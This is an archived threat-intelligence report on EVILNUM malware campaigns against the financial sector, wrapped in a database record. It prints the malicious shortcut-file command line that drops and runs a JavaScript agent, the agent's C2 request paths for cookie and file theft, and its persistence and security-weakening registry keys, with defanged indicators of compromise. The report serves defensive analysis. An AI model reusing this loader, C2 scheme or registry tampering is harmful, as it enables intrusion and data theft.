{ "id": "b0cbe67d-568c-44ac-9000-0136388ac6c8", "created_at": "2026-04-06T01:30:33.185284Z", "updated_at": "2026-04-10T03:34:23.576123Z", "deleted_at": null, "sha1_hash": "97e1730e69de23a5cc1cb97ae6ddb1c9478fd9a3", "title": "Phantom in the Command Shell", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2631614, "plain_text": "Phantom in the Command Shell\r\nPublished: 2020-05-06 · Archived: 2026-04-06 00:35:09 UTC\r\nExecutive Summary\r\nPrevailion’s Tailored Intelligence Team has detected two new criminal campaigns targeting the global financial industry with\r\nthe EVILNUM malware, one of which became active on May 3rd 2020. We have dubbed these new operations “Phantom in\r\nthe [Command] Shell”.\r\nIn these engagements, the attack begins when a victim is enticed into following a link to a file hosted on a well known,\r\nwidely-used cloud provider - unaware that email filters are unlikely to block the domain, and the provider will trust their\r\nown links enough that a scan is unlikely. Once engaged, the victim’s device downloads a compressed folder that contains\r\ntrojanized files. This is a user-initiated infection; meant to appear as a typical business interaction, in this case part of “Know\r\nYour Customer” banking procedures. These trojanized files use images of credit cards, driver’s licenses, passports, and\r\nutility bills. When the files are opened, the decoy images are displayed to the user, while an agent written in headless\r\nJavascript is surreptitiously invoked. Investigation of the agent reveals code comment indicating the two latest iterations are\r\nversion 3.6 and 4.0, respectively. Both are designed for Windows OS.\r\nThe first version of EVILNUM was identified in 2018; the second version was discovered in an unrelated incident response\r\ninvestigation a year later, having infiltrated a FINTECH company. The initial reporting on this malware was the only sign of\r\nits presence, as it briefly faded from view.\r\nEVILNUM has surfaced again in the financial sector with a new variant that has evolved with a very effective tool designed\r\nto evade both standard network- and host-based detection systems. It uses supplementary logic designed to help it adapt to\r\nthe local system and alter its actions - and even the choice of C2 - based upon the antivirus products that are detected on the\r\nhost machine. This agent allows the threat actor to upload files, download files, run commands, steal cookies and access\r\nother protected data. It is designed to persist through reboot by adding a registry key, and even removes artifacts of its\r\npresence from the host machine. Given the versatility added to this variant, we suspect that this agent has the capacity to\r\nload auxiliary payloads onto a host machine.\r\nTechnical Details\r\nIntroduction\r\nPrevailion has discovered an updated variant of the deceptive EVILNUM agent. This agent was delivered to victims from a\r\nURL on a cloud-platform that hosts a zip file. If the link is clicked, the victim downloads a compressed folder riddled with\r\ntrojanized files that masquerade as PDFs and JPEGs. These files display themselves as seemingly innocuous decoys to the\r\nend user, all while quietly running in the background. The first version of EVILNUM malware was observed and reported in\r\n2018. The second version was reported by Palo Alto, targeting a specific financial technology (FinTech) organization. This\r\nreport covers the latest versions 3.6 and 4.0, how they’re delivered, evasion techniques, and communications channels.\r\nInfection Vector\r\nThe infection chain begins when the victim receives a link to a Uniform Resource Locator (URL) hosted on a cloud-based\r\nplatform, in this case GoogleDrive. This technique is increasingly used to avoid intrusion detection system (IDS) rules, by\r\nhosting the malicious file on a 3rd party platform that was likely whitelisted. When that link is clicked and traffic to\r\nGoogleDrive is initiated, it begins the process of downloading a compressed folder from that location. \r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 1 of 9\n\nPhantom in the command shell campaign walk through\r\nMicrosoft Link Lures\r\nPrevailion has thus far identified two compressed files harboring the subject malware, although there is evidence to suggest\r\nthat more zip folders exist. Once decompressed, the folder is found to contain microsoft shortcut (lnk) files that were named\r\nto impersonate either jpeg or pdf files. We have categorized these lnk files into two subcategories. The first set of lures uses\r\nthe basic Know Your Customer (KYC) elements as a ruse, these elements are files that anyone would be asked for when\r\nopening a new account with a finance services organization. Some examples include but are not limited to driver’s license,\r\ncredit cards, credit history documents, and proof of address paperwork. The second subcluster includes a document that\r\nappears to impersonate an established financial services organization, and referenced their 2020 GDPR compliance plan.\r\nGiven the nature of these lures, Prevailion suspects with moderate confidence these efforts were targeted towards select\r\nfinancial institutions rather than wide-scale spamming.\r\nOnce decompress the first zip folders contained the following KYC files:\r\n●      Driv License front.jpg.lnk\r\n●      Driv License back.jpg.lnk\r\n●      Credit Card Front.jpg.lnk\r\n●      Credit Card Back.jpg.lnk\r\n●      Utility Bill.jpg.lnk.\r\nThe name on the drivers license corresponds to a real person, who happens to be the CEO of a Bank located in a British\r\nterritory. The address on the utility bill matches the city of the bank. The second compressed folder was very similar to the\r\nfirst, containing various KYC documents and impersonated a Canadian person who we suspect works for a different\r\nfinancial organization. The last KYC client file that we identified was a Finnish national that we suspect works for a\r\nmanaged cloud services provider. Prevailion was unable to confirm if these documents were authentic, however if forged\r\nthey closely resemble the genuine article.\r\nThe second subcategory contains a file name that references an organization rather than an individual. The document\r\nimpersonates an investment company located in England.  Like the previously mentioned lnk files, when clicked by the user\r\nit launches a script to run in the background of the computer.\r\nAs we mentioned, there is added functionality built into this particular agent, and one element is in the display of a decoy\r\nfile that corresponds to the selected file name. We analysed the properties of the lnk file themselves with lnk parser to search\r\nfor clues left behind by the actor. However all the lnk files had the same forged metadata; the files were timestomped with a\r\ncreation date of September 5th, 2018, from a VMWare device based upon the mac address, that had a NetBIOS name of\r\n“admin-pc”, suggesting they went to some lengths to obfuscate the metadata related to their activities. The lnk file properties\r\ncan be found below. \r\n[Distributed Link Tracker Properties]\r\nVersion:                                      0\r\nNetBIOS name:                          admin-pc\r\nDroid volume identifier:              a82e4430-d4a8-417a-b678-88e886bec590\r\nDroid file identifier:                     8cb9d0c4-b0f4-11e8-b065-005056c00008\r\nBirth droid volume identifier:      a82e4430-d4a8-417a-b678-88e886bec590\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 2 of 9\n\nBirth droid file identifier:             8cb9d0c4-b0f4-11e8-b065-005056c00008\r\nMAC address:                            00:50:56:c0:00:08\r\nUUID timestamp:                       09/05/2018 (10:15:01.429) [UTC]\r\nUUID sequence number:           12389\r\nLoader Functionality\r\nOpening any one of the files, such as “Credit Card Front,” executes a protracted command line argument. The first operation\r\nmoves the file to the Temp folder and renames it “1.lnk”. Then it proceeds to search for all the files that start with “Cred” in\r\nthe Temp directory, and search recursively in all directories modified that day. Next it reads the 1.lnk file and redirects the\r\noutput into a new file named 0.js, It then uses csript to execute that file. The command is as follows:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c path=C:\\Windows\\system32\u0026\u0026move \"Credit Card front.jpg.lnk \"\r\n\"C:\\Users\\admin\\AppData\\Local\\Temp\\1.lnk\"\u0026forfiles /P \"C:\\Users\\admin\\AppData\\Local\\Temp\" /M \"Cred*.lnk\" /S /D 0\r\n/C \"C:\\Windows\\system32\\cmd.exe /c move @path C:\\Users\\admin\\AppData\\Local\\Temp\\1.lnk\"\u0026type\r\n\"C:\\Users\\admin\\AppData\\Local\\Temp\\1.lnk\"|find \"TRU4\"\u003e\"C:\\Users\\admin\\AppData\\Local\\Temp\\0.js\"|rd a||cSCripT\r\n\"C:\\Users\\admin\\AppData\\Local\\Temp\\0.js\"\r\nCore Agent\r\nThis file, 0.js, is the main agent deployed to the victim’s machine. It's written in Phantom and this particular script was\r\ndesigned for Windows OS. One comment in the code suggested that this particular iteration was version 3.6. One of our\r\nfavorite elements was the use of a one-way communication method to obtain the C2, in order to remain elusive. This agent\r\nalso built in a function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack. \r\nOnce initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to\r\nobtain the following information:\r\n●      Computername\r\n●      Username\r\n●      AntiVirus Products\r\nThis agent had traditional trojan functionality, that allowed it to perform the following tasks:\r\n●      Upload files\r\n●      Download files\r\n●      Harvest cookies \r\n●      Get Files, from the C2,\r\n●      Run arbitrary commands\r\n●      Run Windows Script Component (.sct) files\r\n●      Call a python 2.7 interpreter through rundll32\r\n●      Log any errors that the agent generated\r\nOne difference between this variant and previous iterations is the removal of the screenshot functionality. This agent did\r\nmaintain some original functions such as: bringing files down from the C2, and converting strings of data into bytes and\r\nreceiving binary data. This suggests the agent was capable of retrieving subsequent payloads, indicating it was likely just a\r\nfirst stage agent.\r\nRetrieval of C2 Address\r\nOne of the first things the agent does is ping google to check for an internet connection. If the host machine is connected to\r\nthe internet, the agent proceeds to kill any instances of Internet Explorer which have the command line parameter matching\r\n“-Embedding.” It then uses Internet Explorer to retrieve a remote web page that acts as a one-way communication method,\r\nthat web page contains a string that identifies the corresponding C2 node.\r\nLike the previous variants of EVILNUM, the actor set up accounts on GitLab and Digital Point, a web forum. The four\r\nprimary URLs used as drop sites for one-way communications were:\r\n●      hxxps://gitlab[.]com/jhondeer123/test/raw/master/README.md\r\n●      hxxps://www.digitalpoint[.]com/members/johndeer123.923670/\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 3 of 9\n\n●      hxxps://gitlab[.]com/bliblobla123/testingtesting/-/raw/master/README.md\r\n●      hxxps://www.digitalpoint[.]com/members/bliblobla.943007/\r\nThe actor likely set up two web pages that corresponded to each campaign for redundancy. The function would periodically\r\ncheck those two web pages every 180000 seconds (50 hours).\r\nMetadata properties of the most recent campaign show that the “bliblobla123” Gitlab account was created on May 3rd,\r\n2020.\r\nImage showing the date when the Gitlab account was created\r\nImage showing the latest C2 embedded in the README.MD file\r\nThe “johndeer123” Digital Point account associated with version 3.6, was created on February 21, 2019. One of the\r\ndifferences in the 3.6 and 4.0 variants is that the agent obtains the IP address through a regex search for the string\r\n“8346758545”. On the Digital Point web forum instance the observed C2, hxxp://185.62.190[.]89, was stored as a value in\r\nthe “interest” field.\r\nImage of Johndeer123 Digital Point Profile\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 4 of 9\n\nIf the host is running BitDefender, EVILNUM will reach out to a different URL\r\nhxxps://gitlab.com/jhondeer123/test/raw/master/test.py. The agent then searches for the same string “8346758545”. There is\r\nalso some fallback functionality to use “long2ip”, the arithmetic based method, implemented in the previous agent. This\r\nmethod takes the number then divides it by 8 and converts it to an IP address.\r\nCommand and Control Communications\r\nOnce the agent obtains the IP address it will send a GET request to check.php. If the IP address is indeed the correct C2, it\r\nreturns a message padded with “jifhruhajsdfg444” on each side. In this case it received a padded “success” message:\r\nWireshark stream of a check interaction from the victim to the C2\r\nOnce the agent confirms the correct IP address, it proceeds to send a register request. In this POST it sent the host based\r\nenumeration information. Once received the\r\nC2 responded with the agent’s unique identifier that will then get saved at\r\nappDataPath + \\\\Microsoft\\\\Credentials\\\\MediaPlayer\\\\MediaManager\\\\id.txt.\r\nImage of the register function with version 3.6 on the left and 4.0 on the right\r\nBased upon code analysis the following HTTP requests and parameters were identified:\r\n●      “check.php?id=\"+id + \"\u0026ver=\"+ ver\r\n○      Agent confirms it has the right IP address and sends version number\r\n●      “register.php?av=\" + av + \"\u0026cpu-name=\" + cpuName + \"\u0026ref=\"+ REFNAME + \"\u0026user=\" + userName\r\n○      Registers the agent with the C2 and obtain unique identifier\r\n●      \"view.php\", \"id=\" + id);\r\n○      Get commands from the C2\r\n●      \"cookies.php?id=\"+id\r\n○      Upload harvested cookies to the C2\r\n●      \"DOWNLOAD_FILE.php\".toLowerCase(), \"FILE-URL=\".toLowerCase() + fileURL\r\n○      Download file from C2 then place in tmp and appData folders\r\n●      \"send.php?id=\"+id, filePath, \"uploaded_file\"\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 5 of 9\n\n○      Upload file from infected host to C2\r\n●       \"upload.php?id=\"+id, sctFile, \"uploaded_file\"\r\n○      obtain windows script component from from C2, then store it “878478ddd3.TMP”\r\nPersistence\r\nAs we described, the agent will persist through a reboot by adding a registry key. This is the same technique that was used in\r\nthe 2.0 version. One notable feature is that the actor added logic to modify the registry key location, based on the antivirus\r\nproduct that was detected during the enumeration phrase. In the previous version, it would only specify what to do when\r\nBitDefender was installed on the host. The new version added functionality to account for Avast.  If either one of those two\r\nantivirus specific products were detected it created a registry key at:\r\nHKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\. \r\nIf there is no antivirus product detected - or something other than BitDefender and Avast - it will create a registry key at:\r\nHKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows.\r\nBoth keys will then run a shortcut file specified at the path:\r\n\"C:\\\\Users\\\\admin\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\MediaPlayer\\\\MediaManager\\\\Media.lnk\".\r\nThis shortcut file maps to the media.js file, which contains a copy of the core agent. This set of registry persistence\r\nmodifications are stored in a file named media.reg.\r\nThe second registry modification file, mediaIE.reg, is the same file that has been used since version 1 of EVILNUM. These\r\nregistry modifications appear to have remained consistent with the newest iteration versions. The modifications are intended\r\nto weaken the security of the host machine. For example -  one modification removes the “no protect mode” banner,\r\npotentially luring victims into a false sense of security. Another example is the removal of a feature of CCleaner that clears\r\ndata downloaded from browsers, this is likely meant to ensure downloaded scripts or tools were not removed. The registry\r\nkeys and modified parameters are listed below.\r\n●      HKEY_CURRENT_USER\\\\Control Panel\\\\Cursors\r\n\"AppStarting\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,6\r\n○      This decodes to “%.S.y.s.t.e.m.R.o.o.t.%.\\.c.u.r.s.o.r.s.\\.a.e.r.o._.a.r.r.o.w...c.u.r…”\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\r\n○      \"Check_Associations\"=no\r\n○      \"NoProtectedModeBanner\"=dword:00000001\r\n○      \"IE10RunOncePerInstallCompleted\"=dword:00000001\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Recovery\r\n○      “AutoRecover\"=dword:00000002\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\PhishingFilter\r\n○      EnabledV9\"=dword:00000001\\r\\n\\r\\n\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\BrowserEmulation\r\n○      \"MSCompatibilityMode\"=dword:00000001\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\ Advanced\r\n○      “EnableBalloonTips\"=dword:00000000\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\r\n○      “GlobalUserOffline\"=dword:00000000\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner\r\n○      “BrowserMonitoring\"=-\"(Mon)3001\\\"\r\n●      HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\r\n○      \"2500\"=dword:00000003\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 6 of 9\n\nConclusion\r\nThe Phantom in the Command Shell campaign shows that the threat actors behind the EVILNUM malware family are\r\nconstantly advancing their techniques as they continue to focus their efforts on the global banking/financial system. The\r\ndifferences between the 3.6 and 4.0 variants appear to be trivial and do not affect functionality.\r\nThis group has been targeting the financial sector since 2018 and has achieved success due to their ability to use innovative\r\nmethods to stay ahead of defensive measures, such as the use of javascript-based agents instead of relying upon more\r\ncommonly used methods such as executable files. They have continued to evolve this agent by modifying the location of\r\ncertain files to avoid detection by specific antivirus products and changing communications patterns when certain products\r\nare being employed. They created an elaborate command and control retrieval tactic by embedding instructions to use well\r\nknown platforms, in order to bypass detection. They also configured the agent to use different C2 nodes depending on the\r\nsecurity products used by the host machine.\r\nOne possible way to protect against this threat, is to disable Microsoft shortcut files on high risk machines that routinely\r\ninteract with untrusted parties. These high risk machines should also be segmented within the network to impede attackers'\r\nability to spread laterally if they were compromised. We recommend routinely monitoring network logs to check for\r\nabnormal connections to IP addresses associated with virtual private servers.\r\nPrevailion has shared our findings with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy\r\nprotections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber\r\nThreat Alliance, visit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nGDrive URLs\r\nhxxps://drive[.]google[.]com/uc?auth_user=0\u0026id=1KjJy7FCn-4IN7rsOSwWmSab3xVfY-wNn\u0026export=download\r\nhxxps://docs[.]google[.]com/uc?authuser=0\u0026id=1TROQjDFvR1pw7QckQq1TUVnOYUK6tR6Q\u0026export=download\r\nZip Files\r\n0f4b51dafe6bd75bce2cfbd1fe16d1af91fd958084e23b526671b4e05423f9ee\r\n97aa67531305da6fb73198fabd05b0592705c427519670a218d68d9def83f764\r\n83f1af96b4a15b3b8ec7490de83555000800779d6456ccd017ba02623704f80c\r\nMicrosoft ShortCut (Lnk) Files\r\n9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5\r\nb89cc69c63894c4b263be5a7b7390d3f8500a8ed4834882a7282ebca301e528e\r\n951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b\r\n7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6\r\n4930874f700dd81bff1c0f2ec7a8f55741987e102be8164bdc4aad6ea97062cb \r\n1bd7598549a967fe6df9c79a173e3f6c6721ec21088e5e1543e2865436cce284 \r\n88537039a4b87ff55ef9a57c21f728ecf90e40e532486913d763e16db04ccac4 \r\n01f1f23649920e30d510f6ae48e370c82dd57ce0817d12f649615d7188c9b0e2 \r\nca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30 \r\nCeb892d73cbfea205239dab384101305a957bfd675486a126787a74068c1ddea\r\n83e5eeb549543e16f98eb26d848194baa8273d5e0408c72222999535f91434fe \r\n4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade \r\nBb8b6c6b9b157b093ba5ff60ec5e9e9268b3efa4ebd46a403859a4d65d21cce7\r\n7d643b369be21f07be4893097084e685f8ea7583d01f19ece6ee3bb86cec062e\r\n69d94240bf1b3dae168934be93d742e2b5e41c2767b4573ccabf3c79c8a017d4\r\nE06ab6b87c4977c4ee30f3925dd935764a0ec0da11458aca4308da61b8027d76\r\n79ddc62bcab8efaef586c7e4202fa6a40a82a37571cbab309812602f7a03162b\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 7 of 9\n\nCore Agent\r\nJavascript agent version 4.0\r\n75ae7bbdbfccde37a545a6b316e885e9a6d1ecf3c069fa48594a6db6f30c41d0\r\nJavascript agent version 3.6\r\n8c770d3424324030887fd6efcd7b989129f1430b8dafb482372240e93c009a24\r\n951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b\r\nJavascript agent version 3.5\r\nba4ca5ae0aeb7916a6b08320830bb48c756f7ebaa281431e1311cb66dba3bca0\r\n8100351010C260A7BDC2D283065097140418B5A33CF682F902E793FFAED263D4\r\nMedia.reg\r\n9FEE4514F8B3027AD045E67EE8D80317DD2AFBF7A996C97F47C216EAD011B070\r\nMediaIE.reg\r\n6cc5a6ce509a7bbbcaeab1f0635c8b14cbd6a5503cde799de3163fbf70221301\r\nActor created Folders\r\nappData + \\\\Microsoft\\\\Credentials\\\\MediaPlayer\\\\MediaManager\\\\\r\nappData + \\\\Microsoft\\\\Credentials\\\\MediaPlayer\\\\UtilitiesLog\\\\\r\nC2 Retrieval URLs\r\nhxxps://gitlab[.]com/bliblobla123/testingtesting/-/raw/master/README.md\r\nhxxps://www.digitalpoint[.]com/members/bliblobla.943007/\r\nhxxps://gitlab[.]com/jhondeer123/test/raw/master/README.md\r\nhxxps://www.digitalpoint[.]com/members/johndeer123.923670/\r\nhxxps://gitlab[.]com/jhondeer123/test/raw/master/test.py\r\nCommand and Control Node\r\nhxxp://139.28.37[.]63\r\nhxxp://185.62.190[.]89\r\nhxxp://185.62.190[.]218\r\nMITRE ATT\u0026CK Framework Mapping\r\nTactic Technique\r\nInitial Access Spear Phishing Link (T1192)\r\nExecution User Execution (T1204)\r\nPersistent Registry Run Keys / Startup Folder (T1060)\r\nDefensive Evasion\r\nTimestomping (T1099), Indicator Removal from host (T1070),\r\nModify Registry (T1112), Hidden Window (T1143), rundll32 (T1085),\r\nCredential Access Steal Web Session Cookie (T1539)\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 8 of 9\n\nCollection Data from Local System (T1005),  Data Staged (T1074)\r\nCommand \u0026 Control\r\nCommonly used port (T1043), Web service (T1102),\r\nRemote File copy (T1105)\r\nExfiltration Exfiltration Over Command and Control Channel (T1041)\r\nSource: https://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nhttps://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://web.archive.org/web/20210422172657/https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html" ], "report_names": [ "phantom-in-command-shell5.html" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439033, "ts_updated_at": 1775792063, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/97e1730e69de23a5cc1cb97ae6ddb1c9478fd9a3.pdf", "text": "https://archive.orkl.eu/97e1730e69de23a5cc1cb97ae6ddb1c9478fd9a3.txt", "img": "https://archive.orkl.eu/97e1730e69de23a5cc1cb97ae6ddb1c9478fd9a3.jpg" } }